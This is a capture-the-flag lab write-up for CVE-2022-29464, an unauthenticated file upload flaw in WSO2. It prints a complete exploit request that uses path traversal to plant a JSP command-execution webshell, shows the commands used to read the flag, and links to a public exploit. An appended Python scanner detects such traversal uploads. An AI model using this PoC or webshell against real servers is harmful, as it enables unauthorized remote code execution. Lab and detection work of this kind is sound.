春秋云镜 CVE-2022-29464 WSO2 File Upload Vulnerability
Target description:
The WSO2 file upload vulnerability (CVE-2022-29464) is a critical vulnerability in WSO2 discovered by Orange Tsai. It is an unauthenticated, unrestricted arbitrary file upload that allows an unauthenticated attacker to obtain RCE on the WSO2 server by uploading a malicious JSP file.
Start the scenario
Exploitation
PoC
POST /fileupload/toolsAny HTTP/1.1
Host: localhost:9443
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 729
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0
--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"
<FORM>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
    String cmd = request.getParameter("cmd");
    String output = "";
    if (cmd != null) {
        String s = null;
        try {
            Process p = Runtime.getRuntime().exec(cmd, null, null);
            BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
            while ((s = sI.readLine()) != null) { output += s + "</br>"; }
        } catch (IOException e) { e.printStackTrace(); }
    }
%>
<pre><%=output %></pre>
--4ef9f369a86bfaadf5ec3177278d49c0--
Construct the request packet shown above; a response of 1.6877661707702727E12 means the upload succeeded.
Visit https://eci-2ze665dz2c55qojfj419.cloudeci1.ichunqiu.com:9443/authenticationendpoint/1.jsp to execute commands.
List files: https://eci-2ze665dz2c55qojfj419.cloudeci1.ichunqiu.com:9443/authenticationendpoint/1.jsp?cmd=ls
Show the flag: https://eci-2ze665dz2c55qojfj419.cloudeci1.ichunqiu.com:9443/authenticationendpoint/1.jsp?cmd=cat+%2Fflag
The flag is obtained:
flag{ef1649bf-6a41-490e-9755-fd24e6cee750}
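As an added defensive example (not part of this writeup and not WSO2's own code), the Python below scans a captured HTTP request for the pattern the PoC above depends on: a multipart part whose Content-Disposition name or filename is not a single path component (the traversal into repository/deployment/server/webapps), with JSP scriptlet markers in the body as a second, independent indicator. The sample request is constructed, with the JSP webshell body replaced by a placeholder; is_single_path_component is also the validation an upload handler should apply before joining a client-supplied name to a directory.

```python
import posixpath
from email.parser import BytesParser

# Constructed sample request shaped like the PoC above; the JSP body is a placeholder.
SAMPLE_REQUEST = (
    b"POST /fileupload/toolsAny HTTP/1.1\r\n"
    b"Host: localhost:9443\r\n"
    b"Content-Type: multipart/form-data; boundary=deadbeef\r\n"
    b"\r\n"
    b"--deadbeef\r\n"
    b'Content-Disposition: form-data; name="../../../../repository/deployment/'
    b'server/webapps/authenticationendpoint/1.jsp"; filename="1.jsp"\r\n'
    b"\r\n"
    b"<% out.println(1); %>\r\n"
    b"--deadbeef--\r\n"
)


def is_single_path_component(name):
    """A safe upload name is exactly one path component: no '/', '\\', NUL or '..'."""
    if not name or "\x00" in name or "\\" in name:
        return False
    return name == posixpath.basename(name) and name not in (".", "..")


def scan_multipart_request(raw):
    """Return one finding per multipart part that looks like a traversal upload.
    The HTTP request line is dropped so the header block and body parse as MIME."""
    msg = BytesParser().parsebytes(raw.split(b"\r\n", 1)[1])
    findings = []
    if not msg.is_multipart():
        return findings
    for idx, part in enumerate(msg.get_payload()):
        field = part.get_param("name", header="content-disposition") or ""
        fname = part.get_filename() or ""
        body = part.get_payload(decode=True) or b""
        reasons = [
            f"{label} is not a single path component: {value!r}"
            for label, value in (("name", field), ("filename", fname))
            if value and not is_single_path_component(value)
        ]
        # JSP source in the body is an independent indicator of a webshell drop.
        if b"<%" in body and (field.endswith(".jsp") or fname.endswith(".jsp")):
            reasons.append("body contains JSP scriptlet markers")
        if reasons:
            findings.append({"part": idx, "name": field, "filename": fname,
                             "reasons": reasons})
    return findings
```

Run scan_multipart_request over requests captured in front of /fileupload/* to alert on this class of upload; a benign upload named report.pdf produces no finding.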
Exploit (EXP)
https://github.com/hakivvi/CVE-2022-29464
Those who are interested can try it themselves.